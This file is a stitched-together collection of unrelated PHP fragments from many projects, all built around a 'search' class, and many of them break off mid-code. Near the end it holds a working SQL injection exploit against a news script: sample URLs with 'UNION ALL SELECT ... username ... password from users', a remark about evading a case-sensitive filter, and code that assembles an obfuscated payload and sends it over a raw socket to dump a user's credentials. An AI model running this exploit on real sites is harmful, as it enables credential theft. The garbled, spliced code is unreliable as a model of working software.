static function getObjectPoolBySolrQuery($solr_query = null)
{
include_once drupal_get_path('module', 'apiary_project') . '/workflow/include/search.php';
$solr_search = new search();
$specimen_list = array();
if (strpos(strtolower($solr_query), 'q=') > -1) {
} else {
$solr_query = 'q=' . $solr_query;
}
if (strpos(strtolower($solr_query), '&rows=') > -1) {
} else {
$solr_query .= '&rows=10000';
}
$solr_results = $solr_search->doSearch($solr_query);
if ($solr_results != false) {
$solr_sxml = new SimpleXMLElement($solr_results);
foreach ($solr_sxml->result[0]->doc as $doc) {
foreach ($doc->children() as $sxml_node) {
$node_value = (string) $sxml_node;
if (strpos($node_value, 'ap-specimen:') > -1) {
if (!array_search($node_value, $specimen_list)) {
array_push($specimen_list, $node_value);
}
}
}
}
}
return $specimen_list;
}
public function generate_rss($context, $hash)
{
global $opac_url_base, $dbh;
$this->notices_list = array();
$mc = unserialize($context);
$search = new search($mc["search_type"]);
$search->unserialize_search(serialize($mc["serialized_search"]));
$table = $search->make_search();
$q = "select distinct notice_id from {$table} ";
$res = pmb_mysql_query($q, $dbh);
if (pmb_mysql_num_rows($res)) {
while ($row = pmb_mysql_fetch_object($res)) {
$this->notices_list[] = $row->notice_id;
}
}
$flux = new newrecords_flux(0);
$flux->setRecords($this->notices_list);
$flux->setLink($opac_url_base . "s.php?h={$hash}");
$flux->setDescription(strip_tags($mc["human_query"]));
$flux->xmlfile();
if (!$flux->envoi) {
return;
}
@header('Content-type: text/xml');
echo $flux->envoi;
}
public function page_not_found()
{
global $router;
$params = $router->params;
unset($params['controller']);
unset($params['action']);
$terms = empty($params[0]) ? '' : $params[0];
expCSS::pushToHead(array("unique" => "search-results", "link" => $this->asset_path . "css/results.css"));
$search = new search();
$page = new expPaginator(array('model' => 'search', 'controller' => $this->params['controller'], 'action' => $this->params['action'], 'records' => $search->getSearchResults(implode(' ', $params)), 'order' => 'score', 'dir' => 'DESC'));
assign_to_template(array('page' => $page, 'terms' => $terms));
}
public function getTextBySection($section)
{
global $db;
$id = is_object($section) ? $section->id : $section;
$refs = $db->selectObjects('sectionref', 'section=' . $id);
ob_start();
$mods = array();
foreach ($refs as $ref) {
$loc = null;
$loc->mod = $ref->module;
$loc->src = $ref->source;
$loc->int = $ref->internal;
if (!empty($loc->src)) {
if ($ref->module == 'containermodule') {
foreach ($db->selectObjects('container', "external='" . serialize($loc) . "'") as $mod) {
$mods[] = $mod;
$modloc = unserialize($mod->internal);
expTheme::showAction($modloc->mod, 'index', $modloc->src, array('view' => $mod->view, 'title' => $mod->title));
}
} else {
foreach ($db->selectObjects('container', "internal='" . serialize($loc) . "'") as $mod) {
$mods[] = $mod;
}
}
}
}
$text = search::removeHTML(ob_get_contents());
ob_end_clean();
return $text;
}
function search()
{
system::setParam("page", "srch");
if (!empty($_GET["text"])) {
$words = htmlspecialchars(addslashes($_GET["text"]));
$offset = 1;
if (isset($this->get["offset"])) {
$offset = intval($this->get["offset"]);
}
$cacheID = "SEARCH_RES|{$words}|typeArticle|blogsearchoffset_{$offset}";
$this->smarty->assign("searchWord", $words);
if (mb_strlen($words) <= 2) {
$this->smarty->assign("smallWord", true);
return false;
}
$this->smarty->setCacheID($cacheID);
if (!$this->smarty->isCached()) {
$res = search::searchWithType($words, "article");
if ($res->getNumRows() > 0) {
$posts = $res->fetchAll();
$this->smarty->assign("searchRes", $posts);
}
}
} else {
system::redirect('/');
}
}
static function activate() {
// Update the root item. This is a quick hack because the search module is activated as part
// of the official install, so this way we don't start off with a "your index is out of date"
// banner.
search::update(model_cache::get("item", 1));
search::check_index();
}
/**
* Public function that creates a single instance
*/
public static function getInstance()
{
if (!isset(self::$_instance)) {
self::$_instance = new self();
}
return self::$_instance;
}
/**
* @return string An error message suitable for inclusion in the task log
*/
static function check_index()
{
list($remaining) = search::stats();
if ($remaining) {
site_status::warning(t('Your search index needs to be updated. <a href="%url" class="g-dialog-link">Fix this now</a>', array("url" => html::mark_clean(url::site("admin/maintenance/start/search_task::update_index?csrf=__CSRF__")))), "search_index_out_of_date");
}
}
static function update_index($task)
{
try {
$completed = $task->get("completed", 0);
$start = microtime(true);
foreach (ORM::factory("item")->join("search_records", "items.id", "search_records.item_id", "left")->where("search_records.item_id", "IS", null)->or_where("search_records.dirty", "=", 1)->find_all(100) as $item) {
// The query above can take a long time, so start the timer after its done
// to give ourselves a little time to actually process rows.
if (!isset($start)) {
$start = microtime(true);
}
search::update($item);
$completed++;
if (microtime(true) - $start > 0.75) {
break;
}
}
list($remaining, $total, $percent) = search::stats();
$task->set("completed", $completed);
if ($remaining == 0 || !($remaining + $completed)) {
$task->done = true;
$task->state = "success";
site_status::clear("search_index_out_of_date");
$task->percent_complete = 100;
} else {
$task->percent_complete = round(100 * $completed / ($remaining + $completed));
}
$task->status = t2("one record updated, index is %percent% up-to-date", "%count records updated, index is %percent% up-to-date", $completed, array("percent" => $percent));
} catch (Exception $e) {
$task->done = true;
$task->state = "error";
$task->status = $e->getMessage();
}
}
static function update_index($task)
{
try {
$completed = $task->get("completed", 0);
$start = microtime(true);
foreach (ORM::factory("item")->join("search_records", "items.id", "search_records.item_id", "left")->where("search_records.item_id", null)->orwhere("search_records.dirty", 1)->find_all() as $item) {
if (microtime(true) - $start > 1.5) {
break;
}
search::update($item);
$completed++;
}
list($remaining, $total, $percent) = search::stats();
$task->set("completed", $completed);
if ($remaining == 0 || !($remaining + $completed)) {
$task->done = true;
$task->state = "success";
site_status::clear("search_index_out_of_date");
$task->percent_complete = 100;
} else {
$task->percent_complete = round(100 * $completed / ($remaining + $completed));
}
$task->status = t2("one record updated, index is %percent% up-to-date", "%count records updated, index is %percent% up-to-date", $completed, array("percent" => $percent));
} catch (Exception $e) {
$task->done = true;
$task->state = "error";
$task->status = $e->getMessage();
}
}
public function fetch()
{
$search = new search();
$data_deal = $search->get_goods_of_day();
$data_new['blocks'] = $search->get_new_goods();
$this->template->add_template("header");
$this->template->set_global(array("tree_html" => $this->get_tree(), "site" => $this->this_site), "header");
$header = $this->template->parse("header");
$this->template->add_template("footer");
$footer = $this->template->parse("footer");
$this->template->add_template("index");
$this->template->set_global(array("header" => $header, "footer" => $footer, "site" => $this->this_site), "index");
$this->template->set_block("deal_of_day", $data_deal[1], "index");
$this->template->set_block("deal_yesterday", $data_deal[0], "index");
$this->template->set_block("deal_tomorrow", $data_deal[1], "index");
$this->template->set_block("new_goods", $data_new, "index");
echo $this->template->parse("index");
}
public function fetch()
{
$start = microtime();
/* Генерация хедера */
$this->template->add_template("header");
$this->template->set_global(array("site" => $this->this_site, "tree_html" => $this->get_tree()), "header");
$header = $this->template->parse("header");
/*Генерация футера*/
$this->template->add_template("footer");
$footer = $this->template->parse("footer");
/********************************************/
//print_r($this->args);
$t_name = '';
if ($this->args['good'] != 0) {
$t_name = "shop_cart";
} elseif ($this->args['group'] != 0) {
$t_name = "classes";
} elseif ($this->args['node'] != 0 && $this->args['class'] != 0) {
$t_name = "goods";
} elseif ($this->args['node'] != 0 || $this->args['searchword'] != '') {
$t_name = "goods";
}
$path = $this->search->get_path($this->args);
$this->template->add_template("chain", "catalog");
$this->template->set_block("path_data", array("data" => $path), "chain", "catalog");
$path_html = $this->template->parse("chain", "catalog");
$current_url = $this->make_current_url();
$this->template->add_template($t_name, "catalog");
$this->template->set(array("footer" => $footer, "header" => $header, "site" => $this->this_site), $t_name, "catalog");
$data = $this->search->get_info($this->args);
$this->template->add_template("pager", "catalog");
$this->template->set_global(array("current_url" => $current_url), "pager", "catalog");
$this->template->set_block("data", $data['pager'], "pager", "catalog");
$pager = $this->template->parse("pager", "catalog");
$this->template->set_global(array("site" => $this->this_site, "path_html" => $path_html), $t_name, "catalog");
if ($pager) {
$this->template->set_global(array("pager_html" => $pager), $t_name, "catalog");
}
//print_r($data);
$this->template->set_block("data", $data, $t_name, "catalog");
//print_r($this->template);
echo $this->template->parse($t_name, "catalog");
echo "\n\ntotal time = " . 1000 * (microtime() - $start) . " ms";
}
public function action_search()
{
$urlparams = array('search' => optional_param('search', null, PARAM_TEXT), 'group' => optional_param('group', 0, PARAM_INT), 'page' => optional_param('page', 1, PARAM_INT), 'role' => optional_param('role', 0, PARAM_INT), 'type' => optional_param('type', base::TYPE_ALL, PARAM_INT));
if (optional_param('resetbutton', 0, PARAM_ALPHA)) {
redirect(new \moodle_url('/mod/mediagallery/view.php', array('action' => 'search', 'id' => $this->cm->id)));
}
$params = array_merge($urlparams, array('collection' => $this->collection, 'courseid' => $this->course->id, 'context' => $this->context));
$search = new search($params);
$results = $search->get_results();
if (optional_param('exportbutton', 0, PARAM_ALPHA)) {
return $search->download_csv();
}
$form = new form\search(null, array('context' => $this->context, 'collection' => $this->collection), 'post', '', array('id' => 'searchform'));
$pageurl = new \moodle_url('/mod/mediagallery/search.php', $urlparams);
$perpage = 0;
$totalcount = 0;
$renderable = new output\searchresults\renderable($results, $pageurl, $totalcount, $params['page'], $perpage);
return $this->renderer->search_page($form, $renderable);
}
public function get_value()
{
global $dbh;
if (!count($this->value)) {
if ($this->parameters['equation']) {
$equ = new equation($this->parameters['equation']);
$search = new search();
$search->unserialize_search($equ->requete);
$table = $search->make_search();
$result = pmb_mysql_query("select * from " . $table, $dbh);
if (pmb_mysql_num_rows($result)) {
while ($row = pmb_mysql_fetch_object($result)) {
$this->value[] = $row->notice_id;
}
}
}
}
return $this->value;
}
static function get_siblings($q, $album, $limit, $offset)
{
if (!isset($limit)) {
$limit = 100;
}
if (!isset($offset)) {
$offset = 1;
}
$result = search::search_within_album(search::add_query_terms($q), $album, $limit, $offset);
return $result[1];
}
public function get_datas()
{
//on commence par récupérer l'identifiant retourné par le sélecteur...
if ($this->parameters['selector'] != "") {
for ($i = 0; $i < count($this->selectors); $i++) {
if ($this->selectors[$i]['name'] == $this->parameters['selector']) {
$selector = new $this->parameters['selector']($this->selectors[$i]['id']);
break;
}
}
$values = $selector->get_value();
$searcher = new search(false);
$current_search = $searcher->serialize_search();
$searcher->destroy_global_env();
global $search;
$search = array();
$search[] = "d_" . $values['cp'];
$op = "op_0_d_" . $values['cp'];
$field = "field_0_d_" . $values['cp'];
global ${$op}, ${$field};
${$op} = "EQ";
${$field} = $values['cp_val'];
$table = $searcher->make_search();
$query = "select notice_id from " . $table;
$result = pmb_mysql_query($query);
$records = array();
if (pmb_mysql_num_rows($result)) {
while ($row = pmb_mysql_fetch_object($result)) {
$records[] = $row->notice_id;
}
}
$searcher->unserialize_search($current_search);
$records = $this->filter_datas("notices", $records);
if ($this->parameters['nb_max_elements'] > 0) {
$records = array_slice($records, 0, $this->parameters['nb_max_elements']);
}
$return = array('title' => 'Liste de Notices', 'records' => $records);
return $return;
}
return false;
}
public static function get_list($_FORM)
{
global $TPL;
$current_user =& singleton("current_user");
$wiki_path = wiki_module::get_wiki_path();
$files = search::get_recursive_dir_list($wiki_path);
foreach ($files as $row) {
$file = str_replace($wiki_path, "", $row);
if ($_FORM["starred"] && $current_user->prefs["stars"]["wiki"][base64_encode($file)]) {
$rows[] = array("filename" => $file);
}
}
return (array) $rows;
}
static function get_display_context($item, $title, $query_terms, $q)
{
$position = search::get_position($item, $query_terms);
if ($position > 1) {
list($count, $result_data) = search::search($query_terms, 3, $position - 2);
list($previous_item, $ignore, $next_item) = $result_data;
} else {
$previous_item = null;
list($count, $result_data) = search::search($query_terms, 1, $position);
list($next_item) = $result_data;
}
$search_url = url::abs_site("search?q=" . urlencode($q) . "&show={$item->id}");
$root = item::root();
return array("position" => $position, "previous_item" => $previous_item, "next_item" => $next_item, "sibling_count" => $count, "breadcrumbs" => array(Breadcrumb::instance($root->title, "/", $root->id)->set_first(), Breadcrumb::instance(t("Search: %q", array("q" => $q)), $search_url), Breadcrumb::instance($item->title, $item->url())->set_last()));
}
static function update_index($task)
{
$completed = $task->get("completed", 0);
foreach (ORM::factory("search_record")->where("dirty", 1)->limit(2)->find_all() as $record) {
search::update_record($record);
$completed++;
}
$task->set("completed", $completed);
list($remaining, $total, $percent) = self::_get_stats();
$task->percent_complete = round(100 * $completed / ($remaining + $completed));
$task->status = t("%done records records updated, index is %percent% up-to-date", array("done" => $completed, "percent" => $percent));
if ($remaining == 0) {
$task->done = true;
$task->state = "success";
site_status::clear("search_index_out_of_date");
}
}
static function install()
{
$version = module::get_version("search");
$db = Database::instance();
if ($version == 0) {
$db->query("CREATE TABLE `search_records` (\n `id` int(9) NOT NULL auto_increment,\n `item_id` int(9),\n `dirty` boolean default 1,\n `data` LONGTEXT default NULL,\n PRIMARY KEY (`id`),\n FULLTEXT INDEX (`data`))\n ENGINE=MyISAM DEFAULT CHARSET=utf8;");
// populate the index with dirty records
$db->query("insert into `search_records` (`item_id`) SELECT `id` FROM `items`");
module::set_version("search", 1);
if (ORM::factory("search_record")->count_all() < 10) {
foreach (ORM::factory("search_record")->where("dirty", 1)->find_all() as $record) {
search::update_record($record);
}
} else {
search::check_index();
}
}
}
public function index()
{
$page_size = module::get_var("gallery", "page_size", 9);
$q = Input::instance()->get("q");
$page = Input::instance()->get("page", 1);
$offset = ($page - 1) * $page_size;
// Make sure that the page references a valid offset
if ($page < 1) {
$page = 1;
}
list($count, $result) = search::search($q, $page_size, $offset);
$max_pages = max(ceil($count / $page_size), 1);
$template = new Theme_View("page.html", "collection", "search");
$template->set_global(array("page" => $page, "max_pages" => $max_pages, "page_size" => $page_size, "children_count" => $count));
$template->content = new View("search.html");
$template->content->items = $result;
$template->content->q = $q;
print $template;
}
function get_recursive_dir_list($dir)
{
$rtn = array();
$dir = realpath($dir) . DIRECTORY_SEPARATOR;
$dont_search_these_dirs = array(".", "..", "CVS", ".hg", ".bzr", "_darcs", ".git");
$files = scandir($dir);
foreach ($files as $file) {
if (!in_array($file, $dont_search_these_dirs)) {
if (is_file($dir . $file) && !is_dir($dir . $file)) {
$rtn[] = $dir . $file;
} else {
if (is_dir($dir . $file)) {
$rtn = array_merge((array) $rtn, (array) search::get_recursive_dir_list($dir . $file));
}
}
}
}
return $rtn;
}
public function index()
{
$page_size = module::get_var("gallery", "page_size", 9);
$q = $this->input->get("q");
$page = $this->input->get("page", 1);
$offset = ($page - 1) * $page_size;
// Make sure that the page references a valid offset
if ($page < 1) {
$page = 1;
}
list($count, $result) = search::search($q, $page_size, $offset);
$template = new Theme_View("page.html", "search");
$template->set_global("page_size", $page_size);
$template->set_global("children_count", $count);
$template->content = new View("search.html");
$template->content->items = $result;
$template->content->q = $q;
print $template;
}
/**
* Set the commonly used variables
*
* @return void
*/
protected static function set_vars()
{
self::$base_dir =& main::$base_dir;
self::$public_dir =& main::$public_dir;
self::$system_dir =& main::$system_dir;
self::$themes_dir =& main::$themes_dir;
self::$theme_dir =& main::$theme_dir;
self::$base_uri =& main::$base_uri;
self::$public_uri =& main::$public_uri;
self::$themes_uri =& main::$themes_uri;
self::$theme_uri =& main::$theme_uri;
self::$cookie =& main::$cookie;
self::$dir = new directory_listing();
self::$markdown = new markdown();
self::$github =& main::$github;
if (isset($_GET['s']) && !empty($_GET['s'])) {
self::$search = search::regex('/' . (string) $_GET['s'] . '/i');
}
}
$V .= "</ul>\n";
$V .= "<ul>\n";
$V .= "<p><u><i><b>" . _("You may also choose one or more optional search filters (not case sensitive).") . "</b></i></u>";
/* license */
$text = _("License");
$V .= "<li><b>{$text}: </b><input name='license' value='{$License}'>";
$V .= "<br>" . _("For example, 'AGPL%'.");
$text = _("Copyright");
$V .= "<li><b>{$text}: </b><input name='copyright' value='{$Copyright}'>";
$V .= "<br>" . _("For example, 'fsf'.");
$V .= "</ul>\n";
$V .= "<input type='hidden' name='item' value='{$Item}'>\n";
$text = _("Search");
$V .= "<input type='submit' value='{$text}'>\n";
$V .= "</form>\n";
/******* END Input form *******/
if ($CriteriaCount) {
if (empty($Page)) {
$Page = 0;
}
$V .= "<hr>\n";
$text = _("Files matching");
$V .= "<H2>{$text} " . htmlentities($Filename) . "</H2>\n";
$UploadtreeRecs = $this->GetResults($Item, $Filename, $tag, $Page, $SizeMin, $SizeMax, $searchtype, $License, $Copyright);
$V .= $this->HTMLResults($UploadtreeRecs, $Page, $GETvars, $License, $Copyright);
}
$this->vars['content'] = $V;
}
}
$NewPlugin = new search();
$NewPlugin->Initialize();
$required_field_flag = 1;
$table_name = 'view';
include_once "../../include/basics/header.inc";
?>
<script src="view.js"></script>
<?php
//echo '<pre>';
//print_r($view);
//echo '<pre>';
if (!empty($view->query)) {
$view_result = view::result_list_in_table(base64_decode($view->query), $view->view_id, $pageno, $per_page, $query_string);
} else {
$view_result = "";
}
$search_form = search::search_form('view', 'views', 'view_search');
if (!empty($pagination)) {
$pagination_statement = $pagination->show_pagination($pagination, 'views', $pageno, $query_string);
}
if (!empty($msg)) {
$show_message = '<div id="dialog_box">';
foreach ($msg as $key => $value) {
$x = $key + 1;
$show_message .= 'Message ' . $x . ' : ' . $value . '<br />';
}
$show_message .= '</div>';
}
?>
<?php
require_once 'views_template.php';
function remove_roi($roi_pid, $nothing, $workflow_id)
{
global $user;
$returnjs = "";
if (Workflow_Users::doesWorkflowHaveUserName($workflow_id, $user->name) && Workflow_Permission::doesWorkflowHavePermission($workflow_id, "canAnalyzeSpecimen")) {
$roi_obj = new roiHandler($roi_pid);
$success = $roi_obj->removeROI($roi_pid, FEDORA_DATABASE_USERNAME . ":" . FEDORA_DATABASE_PASSWORD);
if ($success) {
include_once drupal_get_path('module', 'apiary_project') . '/workflow/include/search.php';
$search_instance = new search();
$search_instance->delete_index($roi_pid);
$returnjs .= "jQuery.jGrowl('ROI [{$roi_pid}] deleted successfully');";
} else {
$returnjs .= "jQuery.jGrowl('ROI [{$roi_pid}] failed to delete');";
}
} else {
$returnjs .= "jQuery.jGrowl('Sorry! You do not have permission for this operation');";
}
echo $returnjs;
}
function searchProject($string, $categories, $page = 1, $type_loading = 1)
{
require_once $_SERVER['DOCUMENT_ROOT'] . '/classes/search/search.php';
require_once $_SERVER['DOCUMENT_ROOT'] . '/classes/projects.php';
require_once $_SERVER['DOCUMENT_ROOT'] . '/classes/professions.php';
$objResponse = new xajaxResponse();
if (!$string) {
$string = '';
}
$limit_project = 10;
if ($type_loading == 0) {
$filter['active'] = 't';
$filter['my_specs'] = 'f';
if ($categories[0] != '-1') {
$filter['categories'][0] = array($categories[0] => '0');
if ($categories[1] != '-1') {
unset($filter['categories'][0]);
$filter['categories'][1] = array($categories[1] => '1');
}
}
$project = new new_projects();
$project->page_size = $limit_project;
$projects = $project->getProjects($total, -1, $page, false, $filter, true, false, null, true);
} else {
$_SESSION['search_tab_active'] = 'projects';
$search = new search(false);
$search->setUserLimit($limit_project);
$search->addElement('projects', true, $limit_project);
$filter['active'] = 't';
$filter['my_specs'] = 'f';
if ($categories[0] != '-1') {
$filter['categories'][0] = array($categories[0] => '0');
if ($categories[1] != '-1') {
unset($filter['categories'][0]);
$filter['categories'][1] = array($categories[1] => '1');
}
} else {
$filter['categories'] = null;
}
$filter['is_closed_contest'] = true;
$search->search($string, $page, $filter);
$element = $search->getElements();
$total = $element['projects']->total;
$projects = $element['projects']->results;
}
$max_page = ceil($total / $limit_project);
$next_page = $page + 1;
if ($projects) {
if ($page > 1) {
$dont_show_hint = true;
}
ob_start();
include $_SERVER['DOCUMENT_ROOT'] . '/wizard/registration/steps/tpl.step.search.project.php';
$html = ob_get_clean();
$objResponse->script("\$('project_search_hint').show()");
} else {
$html = 'Совпадений не найдено';
$objResponse->script("\$('project_search_hint').hide()");
}
if ($next_page > $max_page) {
$objResponse->script("\$('load_project').getElement('.b-button').addClass('b-button_disabled')");
} else {
$objResponse->script("\$('load_project').getElement('.b-button').removeClass('b-button_disabled')");
$objResponse->assign('page-search', 'value', $next_page);
}
if ($page > 1) {
$objResponse->assign('project_loader_content', 'innerHTML', $html);
$objResponse->script("var html = new Element('span', {html:\$('project_loader_content').get('html')});\n \$('project_content').adopt(html);");
$objResponse->assign('project_loader_content', 'innerHTML', '');
} else {
$objResponse->assign('project_content', 'innerHTML', $html);
}
return $objResponse;
}
30. if ($this->news_id == ''){ $this->news_id = $_POST['news_id']; }
31.
32. switch($this->action){
33. case "catrss":
34. $this->catRSS();
35. break;
...
i've found other bugs..:D
news.php?action=view&news_id=1 ' union all select 1,2,username,4,5,password,7,8 from users where user_id=1/*
Result? HACKING ATTEMPT...but this fix is very stupid because isn't case sensitive...
news.php?action=view&news_id=1 ' UNION ALL SELECT 1,2,username,4,5,password,7,8 from users where user_id=1/*
*/
$search = new search();
if (preg_match('/http://(.+?)/i', $argv[1]) or !is_numeric($argv[2])) {
$search->argv();
}
$uid = intval($argv[2]);
$host = explode('/', $argv[1]);
$search->magic();
$code = "1%20%27%2" . "0UNION%20" . "ALL%20SEL" . "ECT%201%2" . "C2%2Cuser" . "name%2C4%" . "2C5%2Cpas" . "sword%2C7" . "%2C8%20fr" . "om%20user" . "s%20where" . "%20user_i" . "d%3D" . $uid . "%23";
$data .= "GET /{$host['1']}/news.php?action=view&news_id={$code} HTTP/1.1\r\n";
$data .= "Host: {$host['0']}\r\n";
$data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: en-us,en;q=0.5\r\n";
$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Connection: close\r\n\r\n";
if (!($socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP))) {
/**
* アカウント管理トップ画面
*
* @created 2015-01-16
* @author R. Kumabe
* @version v1.0
* @copyright Copyright (c) 2015 USEN
*/
$PAGE = "S_MST_ACCOUNT";
require_once '../../_init_auth.php';
require_once 'class.Search.php';
require_once 'maintenance/class.MasterCsv.php';
try {
//クラス宣言
//$account = new account($request);
$search = new search();
$param = array();
$param['page'] = $PAGE;
$id = $_SESSION[SESSION_USER_ID];
$authority = $_SESSION[SESSION_GROUP_CD];
//var_dump ($request);
// アクセス可否を判定
$auth = true;
if (isset($request['search_staff_cd'])) {
$form_staff_cd = $request['search_staff_cd'];
}
if (isset($request['search_name'])) {
$form_name = $request['search_name'];
}
if (isset($request['search_department_cd'])) {
$form_department_cd = $request['search_department_cd'];
